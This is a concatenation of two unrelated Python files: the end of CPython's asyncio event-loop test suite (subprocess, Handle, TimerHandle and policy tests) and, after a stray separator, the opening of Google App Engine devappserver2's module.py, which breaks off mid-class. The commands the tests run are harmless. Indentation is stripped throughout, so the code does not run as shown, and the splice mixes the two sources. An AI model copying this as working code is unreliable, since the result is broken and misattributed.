def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.unpatch_get_running_loop()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
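# asyncio.Handle is the cancellable wrapper that call_soon() and friends
# return: it stores (callback, args, loop), and cancel() sets _cancelled
# and drops the callback/args references so the loop skips it.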
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_at(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
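# Note (added comment): __eq__/__ne__ returning NotImplemented makes Python
# try the reflected operation on the other operand and, failing that, fall
# back to identity comparison, so a TimerHandle never silently compares
# equal to a plain Handle.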
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
module.py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
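# Illustrative example (added; handler values are hypothetical): a STATIC_DIR
# entry with static_dir='static' plus a STATIC_FILES entry with
# upload='images/.*\.png' would produce a pattern roughly like
#   r'^(static/.*)|(images/.*\.png)$'
# (assuming os.path.sep == '/'), letting the runtime refuse reads of files
# that are only served as static content.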
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
